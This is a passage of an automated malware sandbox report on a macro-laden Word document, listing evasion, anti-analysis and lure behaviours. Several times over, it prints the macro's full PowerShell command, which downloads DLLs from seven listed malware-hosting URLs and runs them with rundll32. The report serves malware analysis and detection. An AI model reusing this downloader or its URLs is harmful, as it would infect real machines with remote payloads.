Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_000007FF00260F3C sldt word ptr [eax]

4_2_000007FF00260F3C

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: 704.doc	OLE indicator, VBA stomping: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator, VBA stomping: true

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj

Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No contacted IP infos

AV Detection:

Antivirus detection for URL or domain

Source: http://ckfoods.net/wp-admin/wPInm2rgMu/	Avira URL Cloud: Label: malware
Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/	Avira URL Cloud: Label: malware
Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: 704.doc

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://adorwelding.zmo
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://adorwelding.zmotp
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://ckfoods.net/wp-admin/wP
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://huskysb.com/wordpre
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp	String found in binary or memory: http://huskysb.com/wordpress/6f0qIQ
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://manak.edunetf
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://primtalent.com/wp-admin/9
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp	String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp

Jump to behavior

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE@TENT" buttons to pcenew INS Document O CI D O Page, 1 of 1 I Wo
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for procecled documents CI You have to press "ENAB
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 10
Source: Screenshot number: 12	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: ~DF59F33552EDE7EF7C.TMP.0.dr

Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)			Name: fjow3efyw98efhasdokfhlnkvawofh3
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)

Document contains no OLE stream with summary information

Source: 704.doc	OLE indicator has summary info: false
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE indicator has summary info: false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator has summary info: false

Yara signature match

Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, type: DROPPED

Document has an unknown application name

Source: 704.doc	OLE indicator application name: unknown
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE indicator application name: unknown
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator application name: unknown

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 704.doc	OLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
Source: VBA code instrumentation	OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_Open	Name: Document_Open
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Document contains embedded VBA macros

Source: 704.doc	OLE indicator, VBA macros: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE indicator, VBA macros: true

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.........n.....................................`I.........v.....................K......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............ZU.k....@.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
